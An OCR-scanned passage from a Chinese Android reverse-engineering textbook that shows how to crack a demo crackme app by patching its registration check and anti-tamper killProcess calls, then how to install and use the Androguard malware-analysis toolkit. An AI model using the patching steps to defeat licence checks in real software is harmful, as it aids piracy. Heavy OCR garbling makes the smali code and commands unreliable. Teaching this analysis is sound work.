法 是 前 面 按钮 的 事件 响应 代码 。 接 下 来 查看 MainActivity$2.onClick0) 方 法 ， 
双击 代码 行 ， 来 到 相应 的 反 汇编 代码 处 ， 按 下 空格 键 切换 到 IDA Pro 的 流程 
视图 ， 如 图 5-10 所 示 ， 代 码 的 “分 水 岭 ” 就 是 “if-eqz v2, loc_2D0DC”。 图 中 左 
边 红色 箭头 表示 条 件 不 满足 时 执行 的 路 线 ， 右 边 的 绿色 箭头 是 条 件 满足 时 
执行 的 路 线 。 


"NR 
Method 2978 (8xba2): 
public void 
con.droider.crackme8582 .Hainfctiuity$2.onClick( 
android.uieuw.Uieu p8) 
this - vh 
p8 = v5 
neuy-instance v8, «t: Hainfctivity$SNChecker? 
iget-object v2, this, Hainfictiuitu$2 this$8 
iget-object v3, this, Hainfictivity$2 this$8 
invoke-static {v3}, «ref Hainfictivity.access$1(ref) MainActivity access$1G8LL» 
nove-result-object v3 
invoke-virtual (v3), <ref EditText.getText() imp. @ def EditText getTextGL» 
nmove-result-object v3 
invoke-interface {v3}, <ref Editable.toString() imp. @ def Editable toStringGL» 
noue-result-object v3 
invoke-direct (v8, v2, v3}, «void Hainfictivity$SNChecker.Xinit»(ref, ref) Hainfüctivity$SNChecker init GULL5 
invoke-virtual (v8), «boolean Hainfictiuvity$SNChecker.isRegistered() Hainfictivity$SNChecker isRegistered(32» 
moue-result v2 
if-eqz v2, loc 2D80DC 


* 


v1, aCIxjmcabcngcbo # "15 


d M 国 
const-string 


= 1oc 2D8DC: à) nice mi segs 
const-string v1, aCIxjmcabsfsspp 


goto loc 2D8C6 
Method End 

ud á 

loc 2D8C66: 

iget-object v2, this, Mainfctiuity$2 this$8 

const/A v3, 8 

invoke-static (v2, v1, v3), <ref Toast.makeText(ref, ref, int) imp. @ def Toast makeTextGLLLI» 

nove-result-object v2 

invoke-virtual {v2}, «void Toast.shou() imp. @ def Toast showQ3U» 

locret: 

return-void 


图 5-10 IDA Pro 的 流程 视图 


虽然 不 知道 这 堆 乱 码 字 符 串 分 别 是 什么 ， 但 通过 最 后 调用 的 Toast 来 
看 ， 直 接 修改 if-eqz 即 可 将 程序 破解 。 将 鼠标 定位 到 指令 “if-eqz v2, 
loc_2D0DC” 所 在 行 ， 然 后 点 击 IDA Pro 主 界面 的 “Hex View-A” 选 项 卡 ， 可 看 
到 这 条 指令 所 在 的 文件 偏 移 为 0x2DOBE， 相 应 的 字 节 码 为 “38 02 Of 00", 386 
过 前 面 的 学 习 ， 我 们 知道 只 需 将 if-eqz 的 OpCode 值 38 改 成 if-nez 的 OpCode 值 
39 即 可 。 说 干 说 干 ， 使 用 C32asm 打 开 classes.dex 文 件 ， 将 0x2D0BE 的 38 改 为 
39， 然 后 保存 退出 。 接 着 按照 本 书 4.6 小 节 的 介绍 ， 将 dex 文 件 进行 Hash 修 复 
后 导入 apk 文 件 ， 对 apk 重 新 签名 后 安装 测试 发 现 程序 已 经 破解 成 功 了 。 

为 了 让 读者 看 到 一 种 常见 的 Android 程 序 的 保护 手段 ， 这 里 更 换 一 下 破 
解 思路 。 通 过 图 5-10 可 发 现 ，MainActivity$SNChecker.isRegistered() 方 法 实 
际 上 返回 一 个 Boolean 值 ， 通 过 判断 它 的 返回 值 来 确定 注册 码 是 否 正确 。 现 
在 的 问题 是 ， 如 果 该 程序 是 一 个 大 型 的 Android 软 件 ， 而 且 调 用 注册 码 判 断 
的 地 方 可 能 不 止 一 处 ， 这 种 情况 时 ， 通 常 有 两 种 解决 方法 : 第 一 种 是 使 用 
IDA Pro 的 交叉 引用 功能 查找 到 所 有 方法 被 调用 的 地 方 ， 然 后 修改 所 有 的 判 


断 结果 ; 第 二 种 方法 是 直接 给 isRegistered() 方 法 “动手 术 ”， 让 它 的 结果 永远 
返回 为 真 。 很 显然 ， 第 二 种 方法 解决 问题 更 利落 ， 而 且 一 劳 永 逸 。 

下 面 尝 试 使 用 这 种 方法 进行 破解 ， 首 先 按 下 空格 键 切 换 到 反 汇编 视 
， 发 现 直 接 修 改 方法 的 第 二 条 指令 为 “return v9” 即 可 完成 破解 ， 对 应 机 器 
码 为 “OF 09”， 将 其 修改 完成 后 重新 修复 与 签名 ， 安 装 测试 发 现 程序 启动 后 
就 立即 退出 了 。 这 时 最 先 怀疑 的 是 程序 是 否 修 改正 确 ， 使 用 IDA Pro 重 新 导 
入 修改 过 的 classes.dex 文 件 ， 发 现 修改 的 地 方 没 错 ， 看 来 是 程序 采取 了 某 种 
保护 措施 ! 回想 一 下 前 面 提 到 的 两 种 程序 退出 方法 : Context 的 finish() 方 法 
与 android.os.Process 的 killProcess(0) 方 法 ， 按 下 快捷 键 CTRL+S 并 双击 CODE 
回 到 代码 段 ， 接 着 按 下 快捷 键 ALT+T 搜 索 finish 与 killProcess， 最 后 在 MyApp 
类 的 onCreate() 方 法 中 找到 了 相应 的 调用 ， 查 看 相应 的 反 汇 编 代 码 ， 发 现 这 
段 代码 使 用 Java 的 反射 机 制 ， 手 工 调用 isRegistered() 方 法 检查 字符 串 “11111” 
是 否 为 合法 注册 码 ， 如 果 是 或 者 调用 isRegistered0 失 败 都 说 明 程 序 被 修改 
过 ， 从 而 调用 killProcess(0) 来 杀 死 进程 。 明 白 了 保护 手段 ， 解 决 方法 就 简单 
多 了 ， 直 接 将 两 处 killProcessO 的 调用 直接 nop 掉 〈 修 改 相应 地 方 的 指令 大 
0) 就 可 以 了 。 


5.7 ”恶意 软件 分 析 工 具 包 一 一 Androguard 


对 于 Android 恶 意 软 件 分 析 人 员 来 说 ， 提 起 Androguard 应 该 不 会 感到 阳 
生 ，Androguard 提 供 了 一 组 工具 包 来 辅助 分 析 人 员 快 速 鉴别 与 分 析 APK 文 
件 。 


5.7.4 Androguard 的 安装 与 配置 


Androguard 的 安装 过 程 比较 复杂 ， 而 且 容 易 出 错 ， 作 者 自己 制作 了 一 个 
安装 有 Androguard 的 Ubuntu 系统 镜像 ARE (Android Reverse Engineering) 供 
用 户 下 载 使 用 ， 不 过 就 目前 来 说 ，ARE 默 认 安 装 的 Androguard 版 本 过 低 ， 作 
者 又 没有 更 新 ， 已 经 失去 了 使 用 的 价值 。 


目前 Androguard 最 新 版 本 为 1.6， 笔 者 以 Ubuntu 10.04 演 示 ， 其 安装 方法 


如 下 。 


首先 下 载 版 本 控制 软件 ， 用 来 下 载 工 具 源码 。 执 行 以 下 命令 : 


sudo apt-get install subversion mercurial git-core 


安装 下 载 工 具 wget 与 解压 工具 unzip: 
sudo apt-get install wget unzip 
安装 setuptools: 

cd ~/Downloads 


wget http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c11- 


py2.6.egg 
chmod a+x setuptools-0.6cll1-py2.6.egg 
sudo ./setuptools-0.6cll-py2.6.egg 


J+ 。 

安装 依赖 库 : 

sudo apt-get install python2.6-dev python-bzutils libbz2-dev libmuparser-dev 
libsparsehash-dev 


python-ptrace python-pygments graphviz liblzma-dev libsnappy-dev 
安装 pydot: 

cd -/Downloads 

svn checkout http://pydot.googlecode.com/svn/trunk/ pydot 
cd pydot 

sudo python setup.py instal 

安装 psyco: 

cd ~/Downloads 

svn co http://codespeak.net/svn/psyco/dist/ psyco 
cd psyco 

sudo python setup.py install 

安装 networkx: 

cd ~/Downloads 

git clone https://github.com/networkx/networkx.git 
cd networkx 


sudo python setup.py install 
安装 IPython (注意 : 最 好 使 用 easy_install 安 装 ， 避 人 免 IPython 版 本 冲 


sudo easy install ipython 


安装 Chilkat: 


cd -/Downloads 
wget http://www.chilkatsoft.com/download/chilkat-9.3.2-python-2.6-1686 
-linux.tar.gz 


sudo tar zxvf chilkat-9.3.2-python-2.6-i686-linux.tar.gz -C / 
安装 python-magic : 

cd -/Downloads 

git clone git://github.com/ahupp/python-magic.git 
cd python-magic 

sudo python setup.py install 

J+ . 

安装 pyfuzzy: 

cd -/Downloads 

wget http://nchc.dl.sourceforge.net/project/pyfuzzy/pyfuzzy/pyfuzzy-0.1.0 
/pyfuzzy-0.1.0.tar.gz 

tar zxvf pyfuzzy-0.1.0.tar.gz 


cd pyfuzzy-0.1.0 
sudo python setup.py install 


安装 Androguard : 

hg clone https://androguard.googlecode.com/hg/ androguard 

下 载 完 Androguard 源码 后 ， 打 开 androguard 目录 下 的 
elsimy/elsign/formula/Makefile 文 件 ， 在 CFLAGS 声 明 处 添加 如 下 代码 : 

CFLAGS += -I/usr/include/muParser 

fT7Tandroguard E R F BJelsim/elsign/libelsign/MakefileX:fF, TECFLAGS 
声明 处 添加 如 下 代码 : 

CFLAGS += -I/usr/include/muParser -I/usr/include/python2.6 

修改 完成 后 在 终端 提示 符 下 进入 androguard 目 录 并 执行 make , 
Androguard 就 安装 配置 完成 了 。 

最 后 说 下 安装 Mercury，Mercury 需 te dk 
10.04 的 Python 2.6 无 法 运行 它 ， 这 里 的 安装 只 做 演示 ， 读 者 在 安装 有 Python 
2.7 的 环境 下 使 用 下 面 的 命令 安装 即 可 。 


cd «Androguard HK» 
mkdir mercury 
wget http://labs.mwrinfosecurity.com/assets/299/mercury-v1.1.zip 


unzip mercury-vl.1l.zip 

在 安装 Androguard 的 时 候 ， 各 个 依赖 库 的 版 本 差异 与 网 络 环境 都 有 可 能 
导致 安装 失败 ， 随 着 Androguard 版 本 的 不 断 更 新 ， 其 依赖 库 也 有 可 能 发 生变 
化 ， 笔 者 无 法 保证 上 述 的 安装 方法 能 够 适应 您 的 操作 系统 ， 读 者 可 以 严格 
按照 Androguard 项 目的 wiki 安装 页 的 说 明 进 行 安 装配 置 ， 网 址 是 : 
http://code.google.com/p/androguard/wiki/Installationo 


5.7. Androguard 的 使 用 方法 


Androguard 中 提供 的 每 个 工具 都 是 一 个 独立 的 py 文件 ， 我 以 上 一 节 中 的 
crackme0502.apk 与 破解 后 的 crackme0502_cracked.apk 为 例 ， 来 讲解 它们 的 使 
用 方法 。 

e androapkinfo.py 

androapkinfo.py 用 来 查看 apk 文 件 的 信息 。 该 工具 会 输入 apk 文 件 的 包 、 
资源 、 权 限 、 组 件 、 方 法 等 信息 ， 输 出 的 内 容 比 较 详细 ， 建 议 使 用 时 将 输 
出 信息 重 定向 到 文件 后 再 进行 查看 。 使 用 方法 : 


./androapkinfo.py -i ./crackme0502.apk 
命令 执行 后 输出 信息 如 下 。 


./androapkinfo.py -i ./crackme0502.apk 

crackme0502.apk : 

FILES: 

res/layout/activity main.xml Android's binary XML -51d837ba 
res/menu/activity main.xml Android's binary XML 2471e50a 
AndroidManifest.xml Android's binary XML b5b7132 

resources.arsc data 2a26ed7f 

res/drawable-hdpi/ic action search.png PNG image, 48 x 48, 8-bit colormap, 
non-interlaced 64275be8 

MAIN ACTIVITY: com.droider.crackme0502.MainActivity 

ACTIVITIES: (['com.droider.crackme0502.MainActivity'] 

SERVICES: [] 

RECEIVERS: [] 

PROVIDERS: [] 

Native code: False 

Dynamic code: False 

Reflection code: True 

Lcom/droider/crackme0502/MainActivity; «init» ['ANDROID', 'APP'] 
Lcom/droider/crackme0502/MainActivity; getAnnotations ['ANDROID', 'WIDGET'] 
Lcom/droider/crackme0502/MainActivity; onCreate ['ANDROID', 'WIDGET', 'APP'] 
Lcom/droider/crackme0502/MainActivity; onCreateOptionsMenu ['ANDROID', 'VIEW'] 
Lcom/droider/crackme0502/MyApp; «init» ['ANDROID', 'APP'] 
Lcom/droider/crackme0502/MyApp; onCreate ['ANDROID', 'OS', 'APP'] 


e androaxml.py 


androaxml.py 用 来 解密 apk 包 中 的 AndroidManifest.xml 文 件 。 使 用 方法 : 
./androaxml.py -i ./crackme0502.apk 


输出 结果 如 下 。 


./androaxml.py -i ./crackme0502.apk 


«?xml version-"1.0" ?» 
«manifest android:versionCode-"1" android:versionName-"1.0" 


package-"com.droider.crackme0502" 
xmlns:android-"http://schemas.android.com/apk/res/android"- 
«uses-sdk android:minSdkVersion-"8" android:targetSdkVersion-"15"» 


«/uses-sdk» 
«application android:debuggable-"true" android:icon-"GQ7F020001" 
android:label-"87F050000" android:name-".MyApp" android:theme- 


"@7F060000"> 
«activity android:label="@7F050003" android:name-".MainActivity"» 


«intent-filter» 
«action android:name-"android.intent.action.MAIN"» 


«/action» 
«category android:name-"android.intent.category.LAUNCHER"» 


«/category» 
«/intent-filter» 
«/activity» 
«/application» 


« /manifest» 

e androcsign.py 

androcsign.py 用 于 添加 apk 文 件 的 签名 信息 到 一 个 数据 库 文件 中 。 
Androguard 工 具 目 录 下 的 signatures/dbandroguard 文 件 为 收集 的 恶意 软件 信息 
数据 库 。 在 开始 使 用 androcsign.py 前 需要 为 apk 文 件 编写 一 个 sign 文 件 ， 这 个 
文件 采用 json 格 式 保存 。 下 面 是 笔者 编写 的 crackme0502.apk 的 sign 文 件 
crackme0502.sign 的 内 容 : 


"SAMPLE":"apks/crackme0502.apk" 


"BASE":"AndroidOS", 
"NAME":"DroidDream", 
"SIGNATURE":[ 
( 
"TYPE": "METHSIM', 
"CN":"Lcom/droider/crackme0502/MainActivitySSNChecker;", 
"MN":"isRegistered", 
"Dro" pa" 


SAMPLE 指 定 需要 添加 信息 的 apk 文 件 。BASE 指 定 文件 运行 的 系统 ， 
目前 固定 为 AndroidOS。NAME 是 该 签名 的 名 字 。SIGNATURE 为 具体 的 签 
名 规则 ， 其 中 TYPE 用 来 指定 签名 的 类 型 ， ond ee 
名 ， 此 外 还 有 CLASSSIM 表 示 为 类 签名 ;CN 用 来 指定 方法 所 在 的 类 ; M 
指定 了 方法 名 ; DD 指定 了 方法 的 签名 信息 。BF 用 来 指定 签名 indu 
可 以 同时 满足 1 条 或 多 条 ， 例 如 ， 使 用 SIGNATURE 定 义 了 3 条 签名 规则 ， 当 
软件 的 代码 同时 满足 规则 1 或 规则 2 且 满 足 规则 3 时 说 明 样 本 符合 检测 条 件 ， 
那么 BF 可 定义 为 “"BF" : "(0 or 1) and 2"”。 

在 Androguard 目 录 下 新 建 一 个 apks 目 录 ， 将 crackme0502.apk 复 制 进去 ， 
然后 将 crackme-0502.sign 文 件 复制 到 Androguard 的 signatures 目 录 下 ， 在 终端 
提示 符 下 执行 下 面 的 命令 : 

./androcsign.py -i signatures/crackme0502.sign -o signatures/dbandroguard 

命令 执行 后 crackme0502.apk 的 信息 就 存 入 dbandroguard 数 据 库 了 ， 输 出 

言 息 如 图 5-11 所 示 。 


GO 6 android@ubuntul0: ~/tools/androguard 


File Edit View Terminal Help 


androidQgubuntul0:-/tools/androguard$ 

androidQubuntul0:-/tools/androguard$ ./androcsign.py -i signatures/crackme0502.5s 
ign -0 signatures/dbandroguard 
B[FOI]B[FOP1([Ljava/lang/String;length()I)I]B[]B[R]B[FOP1([Ljava/lang/String; lengt 
h()IH]B[F9P1(Ljava/lang/String;charAt(I)C)G]B[ ]B[I]B[FOP1(Ljava/lang/String; cha 


rAt(I)C)G]B[]B[G]B[G]B[G]B[I]B[]B[I]B[I]B[]B[G]B[FOP1(Ljava/lang/String;charAt(I 
)C3G]B[G]B[] 

[(u'DroidDream': [[[0, 'QLtGMEldQl tGMFAxeOxqYXZhL2xhbmcvU3RyaW5n02xlbmdOaCgpSX1J 
XUJbXUJbUl1CWOYWUDF7TGphdmEvbGFuZy9TdHJpbmc7bGVuZ3RoKCTlJ f UL dQl t GHFAxeOxqYXZhL2xh 
bmcvU3RyaW5n0O2NoYXJBdChJKUN9R11CW11CWO0ldQltGMFAxeOxqYXZhL2xhbmcvU3RyaW5n02NoYXJB 
dChJKUN9R11CW11CWOddQltHXUJbR11CWOldQltdQltJXUJbSV1CWl11CWOddQltGMFAxeOxqYXZhL2xh 
bmcvU3RyaWS5n0O2NoYXJBdChJKUN9R11CWOddQltd', 1.0, 4.455759067518712, 4.53904268152 
44052, 0.0]], u'a'])] 

androideubuntul6:-/tools/androguard$ | | 


图 5-11 androcsign.py 执 行 效果 


e androdd.py 
androdd.py 用 来 生成 apk 文 件 中 每 个 类 的 方法 的 调用 流程 图 。 使 用 方 


^ 


/ 


./androdd.py -i ./crackme0502.apk -o ./out -d -f PNG 

这 里 需要 使 用 -o 选 项 强制 指定 一 个 输入 目录 ，-d 指 定 生成 dot 图 形 文 
件 ，- 人 用 来 指定 输出 的 图 片 格式 ， 可 以 是 PNG 或 卫 G。 不 过 在 笔者 的 Ubuntu 
10.04 上 ， 该 工具 并 没有 很 好 的 工作 。 


e androdiff.py 
androdiff.py 用 来 比较 两 个 apk 文 件 的 差异 。 使 用 方法 如 下 : 


./androdiff.py -i ./crackme0502.apk ./crackme0502 cracked.apk 


命令 执行 后 输出 结果 如 下 。 


./androdiff.py -i ./crackme0502.apk ./crackme0502 cracked.apk 

[ ('Lcom/droider/crackme0502/MainActivity$2;', 'onClick', 

'(Landroid/view/View;)V') ] 

«-» [ ('Lcom/droider/crackme0502/MainActivity$2;', 'onClick', 

'(Landroid/view/View;)V') ] 

onClick-BBG0x0 onClick-BBQ0x0 

Added Elements (1) 
0x32 12 if-nez v2, +15 

Deleted Elements(1) 
0x32 12 if-eqgz v2, +15 

Elements: 
IDENTICAL: 
SIMILAR: 
NEW: 
DELETED: 
SKIPPED: 

NEW METHODS 

DELETED METHODS 


通过 结果 可 以 发 现 ，androdiff 分 析出 了 两 个 apk 之 间 的 差异 ， 
MainActivity$2 类 的 onClick() 方 法 中 有 一 行 代码 不 同 。 

e androdump.py 

androdump.py 用 来 dump 一 个 Linux 进 程 的 信息 。 使 用 方法 如 下 。 

./androdump.py -i pid 

pid 为 一 个 Linux 进 程 的 ID ， 该 工具 使 用 的 时 候 较 少 ， 这 里 就 不 做 介绍 


O O OQ WwW 


fo 

e androgexf.py 

androgexf.py 用 来 生成 APK 的 GEXF 格 式 的 图 形 文件 。 该 文件 可 以 使 用 
Gephi 查 看 。 使 用 方法 : 

./androgexf.py -i ./crackme0502.apk -o ./crackme0502.gexf 

命令 执行 完 后 会 在 crackme0502.apk 目 录 下 生成 crackme0502.gexf，gexf 
是 图 形 数据 文件 ， 可 以 使 用 Gephi 打 开 ， 关 于 Gephi 的 详细 使 用 方法 将 在 下 


一 小 节 介 绍 。crackme0502.gexf 打 开 后 效果 如 图 5-12 所 示 (Windows 版 本 的 
Gephi) 。 
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图 5-12 ”使 用 Gephi 查 看 GEXF 文 件 


e androlyze.py 
androlyze.py 提 供 了 一 个 交互 环境 方便 分 析 人 员 静 态 分 析 Android 程 序 ， 


该 工具 的 功能 非常 强大 ， 而 且 涉 及 的 内 容 较 多 ， 详 细 的 用 法 将 在 5.7.4 节 介 
绍 。 

e andromercury.py 

andromercury.py 是 Mercury 工 具 的 框架 。 功 能 上 是 对 Mercury 的 包装 ， 
Mercury 需 7， 此 处 不 展示 该 工具 ， Mercury 工 具 的 详细 
使 用 方法 会 在 本 书 的 第 11 章 进行 介绍 。 


e androrisk.py 


androrisk.py 用 于 评估 apk 文 件 中 潜在 的 风险 。 使 用 方法 如 下 。 
./androrisk.py -m -i ./crackme0502.apk 


-m 选 项 表明 需要 分 析 apk 中 的 每 一 个 方法 ， 命 令 执行 后 效果 如 图 5-13 所 
Mo 


©QQ®QG@ android&ubuntulO: ~/tools/androguard 


File Edit View Terminal Help 


android@ubuntul0:~/tools/androguard$ 

android@ubuntul0:~/tools/androguard$ ./androrisk.py -m -i ./crackme0502.apk 

./crackme0582 .apk 

RedF lags 
DEX ('NATIVE': 0, 'DYNAMIC': 0, 'CRYPTO': 0, 'REFLECTION': 1) 
APK ('DEX': 0, 'EXECUTABLE': 0, 'ZIP': 0, 'SHELL SCRIPT': O, 'AP 
， 'SHARED LIBRARIES': 0) 
PERM ('PRIVACY': 0, 'NORMAL': O, 'MONEY': ©, 'INTERNET': 0, 'SMS 
, 'DANGEROUS': 8, 'SIGNATUREORSYSTEM': 0, 'CALL': 0, 'SIGNATURE': 0, 'GPS': 


FuzzyRisk 
VALUE 0.0 
androidQubuntul0:-/tools/androguard$ | 


图 5-13 ”androrisk.py 执 行 效果 


从 输出 结果 来 看 ，crackme0502.apk 中 没有 发 现 风 险 ， 唯 独 有 一 项 
REFLECTION 的 值 为 1， 表 示 程 序 中 有 使 用 到 Java 反 射 技术 。 

e androsign.py 

androsign.py 用 于 检测 apk 的 信息 是 否 存 在 于 特定 的 数据 库 中 ， 它 的 作用 
与 androcsign.py 恰 好 相反 。 使 用 方法 : 


./androsign.py -i apks/crackme0502.apk -b signatures/dbandroguard -c 


signatures/dbconfig 


e androsim.py 
androsim.py 用 于 计算 两 个 apk 文 件 的 相似 度 ， 它 是 唯一 一 个 有 Windows 
移植 版 的 工具 ，Windows 平 台 上 该 工具 为 androsim.exe， 使 用 方法 为 : 


./androsim.py -i ./crackme0502.apk ./crackme0502 cracked.apk 


命令 执行 后 输出 结果 如 下 。 


Elements: 
IDENTICAL: 717 
SIMILAR: 1 
NEW : 0 
DELETED: 0 
SKIPPED: 0 
--» methods: 99.983498$ of similarities 
可 以 看 到 两 个 程序 的 相似 度 为 99.983498%。 
e androxgmml.py 
androxgmml.py 用 来 生成 apk/jar/class/dex 文 件 的 控制 流程 及 功能 调用 
图 ， 输 出 格式 为 xgmml。 使 用 方法 如 下 。 
./androxgmml.py -i ./crackme0502.apk -o crackme0502.xgmml 
不 过 很 可 惜 的 是 ， 目 前 不 管 是 在 Ubuntu 10.04， 还 是 Ubuntu 12.04. E fi 
用 该 功能 ， 都 会 运行 错误 ， 并 输出 以 下 错误 提示 : 
AttributeError: DVMBasicBlock instance has no attribute 'get ins' 
后 者 笔者 发 现 这 是 Androguard 的 一 个 bug， 截 止 到 笔者 编写 完 本 章 ， 该 
bug 都 还 没 出 解决 方案 。 
e apkviewer.py 
apkviewerpy 用 来 为 apk 文 件 中 每 一 个 类 生成 一 个 独立 的 graphml 图 形 文 
件 ， 使 用 方法 如 下 。 
./apkviewer.py -i ./crackme0502.apk -o output 
命令 执行 完 后 ， 可 以 使 用 Gephi 打 开 生成 后 的 graphml 文 件 ， 不 过 图 形 中 
的 每 个 节点 是 指令 级 别 的 ， 在 查看 时 效果 没有 方法 级 别 的 gexf 文 件 直观 。 


5.7.3 ”使 用 Androguard 配 合 Gephi 进 行 静态 分 析 


Androguard 可 以 生成 Java 方 法 级 与 Dalvik 指 令 级 的 图 形 文件 ， 配 合 Gephi 
工具 查看 图 形 文件 ， 可 以 快速 地 了 解 程序 的 执行 流程 ， 在 静态 分 析 Android 
程序 时 ， 这 个 功能 非常 方便 。 


下 面 我 们 以 crackme0502.apk 为 例 ， 介 绍 如 何 使 用 Gephi 来 静态 分 析 它 。 
首先 下 载 Gephi 程 序 ，Gephi 是 开源 的 ， 支 持 Mac OSX/Windows/Linux 三 种 平 
台 ， 目 前 最 新 版 本 为 0.8.1 beta， 笔 者 演示 时 下 载 的 是 Windows 版 本 的 安装 程 
序 ， 顺 利安 装 完成 后 启动 界面 如 图 5-14 所 示 。 
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图 5-14 ”Gephi 启 动 界面 


点 击 菜 单项 “文件 -打开 ”， 选 择 上 一 小 节 使 用 Androguard 生 成 的 
crackme0502.gexf，Gephi 会 分 析出 gexf 文 件 的 版 本 为 1.2， 然 后 点 击 确定 按钮 
进入 图 形 显示 界面 。 在 流程 中 选择 “Yifan Hu”， 然 后 点 击 运行 按钮 来 生成 分 
析 图 ， 如 图 5-15 所 示 。 
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图 5-15 ”生成 分 析 图 


分 析 图 生成 完毕 后 ， 点 击 图 形 下 方 的 “I” 按钮 显示 标签 (label) 的 内 
容 ， 然 后 拖 动 旁边 的 两 个 滑 块 来 调整 连接 线 的 粗细 与 文本 的 字体 大 小 ， 如 
图 5-16 所 示 ， 左 边 的 滑 块 用 来 调整 节点 与 节点 之 间 连 接线 的 粗细 ， 右 边 的 滑 
块 用 来 调整 文本 的 字体 大 小 。 
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图 5-16 调整 连接 线 与 文本 大 小 


接 下 来 点 击 Gephi 菜 单 栏 下 方 的 “数据 资料 “按钮 ， 切 换 到 “数据 资料 ” 选 
项 卡 ， 在 过 滤 标 签 劳 边 的 文本 框 中 输入 “OnCreate” 查 找 所 有 OnCreate() 方 
法 ， 结 果 如 图 5-17 所 示 。 
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e Leon/droi der / cr ackne0502/Mai nActivi ved Lcon/ droi der/crackne0S02 /MainActivity; onCreateOpti PEP | Lcon/ droi de onl onlrea (Landroi d/vi ew/Menu; z 
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图 5-17 ”查找 OnCreate() 方 法 


结果 中 的 第 一 条 记录 就 是 MainActivity 的 OnCreate()， 在 第 一 条 记录 上 点 
击 右键 ， 选 择 菜 单项 “在 概述 选 p (这 个 Gephi 的 中 文 翻 译 有 些 别扭 ， 其 含 
义 应 该 是 “在 概览 图 中 选中 ”) ， 然 后 点 击 菜单 下 方 的 概览 按钮 ， 切 换 到 图 
形 显示 页 面 ， A 以 及 它们 之 间 的 连接 线 
都 是 绿色 的 ， 将 鼠标 放 在 OnCreate 节 点 上 ， 可 以 看 到 它 向 下 关联 了 
MainActivity$1.<init> ~ findViewById ~ setContentView ~ MainActivity$2. 
<init> 共 4 个 节点 ， 拖 动 所 有 的 节点 调整 至 合适 位 置 ， 完 成 后 效果 如 图 5-18 所 
示 ，MainActivity 在 OnCreate() 方 法 中 执行 了 哪些 内 容 一 目 了 然 。 
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图 5-18 ”OnCreate() 方 法 的 执行 流程 


按照 上 面 的 步骤 ,我 们 来 查看 OnClick() 方 法 的 节点 ， 找 到 
MainActivity$2 的 OnClick0 方 法 ， 然 后 在 记录 上 点 击 右键 选择 “编辑 节点 ”， 
在 颜色 一 栏 将 其 修改 为 “[255,0,0]”， 设 置 节点 为 红色 ， 然 后 如 法 炮制 的 设置 
OnClick 节 点 的 连接 线 连接 的 几 个 节点 ， 最 后 在 设置 isRegistered 节 点 时 ， 将 
其 尺寸 调整 为 15.0， 最 后 效果 如 图 5-19 所 示 。 
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图 5-19 MainActivity$2 的 OnClick0) 方 法 


点 击 Gephi 的 菜单 项 “文件 -保存 ”， 将 修改 后 的 gexf 文 件 存 为 
crackme0502.gephi， 方 便 以 后 查看 。 可 以 发 现 ， 使 用 Gephi 分 析 apk 文 件 比 
IDA Pro 分 析 还 要 直观 。 除 了 简单 的 显示 方法 调用 外 ，Gephi 还 有 很 多 强大 的 
功能 ， 这 些 就 留 给 读者 自己 慢 慢 去 挖 扬 了 。 


5.7.4 ”使 用 androlyze.py 进 行 静态 分 析 


Androguard 工 具 包 中 的 androlyze.py 与 其 它 的 py 文件 不 同 ， 它 不 是 单一 
功能 的 脚本 ， 而 是 一 个 强大 的 静态 分 析 工 上 只 ， 它 提供 的 一 个 独立 的 Shell 环 
境 来 辅助 分 析 人 员 执 行 分 析 工 作 。 

在 终端 提示 符 下 执行 “./androlyze.py-s” 会 进入 androlyze 的 Shell 交 互 环 
HB, 分析 人 员 可 以 在 其 中 执行 不 同 的 命令 ， 来 满足 不 同情 况 下 的 分 析 需 
求 。androlyze.py 通 过 访问 对 象 的 字段 与 方法 的 方式 来 提供 反馈 结果 ， 分 析 
过 程 中 可 能 会 用 到 3 个 对 象 : apk 文 件 对 象 、dex 文 件 对 象 、 分 析 结 果 对 象 。 


这 3 个 对 象 是 通过 androlyze.py 的 Shell 环 境 (以 下 简称 Shell 环 境 ) 来 获取 的 。 
首先 是 apk 文 件 对 象 ， 以 5.2 小 节 的 crackme0502.apk 为 例 ， 在 Shell 环 境 下 执行 
以 下 命令 : 

a = APK("./crackme0502.apk") 


APK() 方 法 返回 一 个 apk 文 件 对 象 ， 并 赋值 给 a。androlyze.py 的 使 用 有 一 
个 技巧 ， 就 是 在 输入 对 象 名 后 加 上 一 个 点 “.”， 然 后 按钮 Tab 键 ， 终 端 提示 符 
下 显示 该 类 所 有 的 方法 与 字段 ， 输 入 部 分 方法 或 字段 名 按 Tab 键 ， 终 端 提示 
符 会 补 全 提示 。 如 图 5-20 所 示 。 
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File Edit View Terminal Help 


androidQubuntul0:-/tools/androguard$ ./androlyze.py -s " 
Androlyze version 1.6 
1|: a = APK("./crackme0502.apk") 
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图 5-20 ”apk 文 件 对 象 可 用 的 方法 
接着 是 dex 文 件 对 象 的 获取 ， 执 行 以 下 命令 。 
d = DalvikVMFormat(a.get dex()) 


DalvikVMFormat() 执 行 后 会 返回 一 个 dex 文 件 对 象 ， 它 的 可 用 方法 如 
5-21 所 示 。 
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图 5-21 dex 文件 对 象 可 用 的 方法 


接 下 来 是 分 析 结 果 对 象 的 获取 ， 执 行 以 下 命令 。 


dx = 
VMAnalysis() 执 行 返 回 后 将 分 析 结 果 对 象 赋 给 dx，dx 可 用 的 方法 较 少 ， 
如 图 5-22 所 示 。 


VMAnalysis (d) 
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图 5-22 ”结果 对 象 可 用 的 方法 


使 用 3 条 命令 获取 3 个 对 象 的 方法 比较 麻烦 ，Shell 环 境 下 可 以 执行 以 下 
命令 一 次 获取 这 3 个 对 象 。 

a, d, dx = AnalyzeAPK("./crackme0502.apk", decompiler-"dad") 

AnalyzeAPK0 一 次 性 完成 上 面 介绍 的 3 个 方法 调用 ， 其 中 decompiler 指 
定 反 编译 器 的 名 称 ，Androguard 自 带 并 且 默 认 使 用 dad 作 为 dex 文 件 的 反 编 译 
fo 

在 获得 这 3 个 对 象 后 ， 我 们 看 看 如 何 使 用 它们 来 分 析 Android 程 序 。 首 先 
我 们 查看 apk 文 件 的 信息 ， 可 以 执行 a.show()， 该 命令 执行 后 会 输出 apk 压 缩 
包 中 所 有 的 文件 信息 。 我 们 也 可 以 执行 a.files 命 令 获得 相近 的 输出 结果 。 还 
可 以 执行 : 

a.get permissions(): 输出 apk 用 到 的 全 部 权限 。 

a.get providers(): 输出 程序 中 所 有 的 Content Providers 

a.get receivers(): 输出 程序 中 所 有 的 Broadcast Receivere 

a.get services(): 输出 程序 中 所 有 的 Service。 

其 它 的 命令 读者 可 以 自己 手动 党 试 运行 一 遍 。 接 着 是 dex 文 件 对 象 。 该 
